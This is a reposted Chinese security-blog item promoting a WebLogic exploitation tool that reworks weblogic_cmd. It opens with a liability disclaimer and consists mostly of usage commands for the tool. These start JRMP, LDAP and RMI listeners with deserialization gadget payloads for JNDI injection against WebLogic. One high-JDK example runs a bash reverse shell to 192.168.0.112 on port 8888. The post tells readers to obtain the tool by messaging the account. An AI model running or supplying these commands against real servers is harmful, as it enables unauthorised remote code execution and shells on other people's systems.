weblogic历史漏洞利用工具
2022-8-13 08:5:15 Author: 雾晓安全(查看原文) 阅读量:26 收藏

免责声明
由于传播、利用本公众号雾晓安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

0x01 weblogic介绍

工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。

0x02 weblogic使用

  • 列出可控payloads
java -jar weblogic.jar -payloads
  • 启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
  • 启动LDAP/RMI
LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
  • 高版本jndi注入 ldap
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'

0x03 weblogic获取

关注公众号回复“weblogicExp

来源:web安全工具库


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247494429&idx=3&sn=42c066e43000bea0410642a214dbbf98&chksm=ce68249bf91fad8df099e5b8b7b574bd16a610c1caf9eb9e93d1f2007d3fa8e0bc1d6e80dcbe#rd
如有侵权请联系:admin#unsafe.sh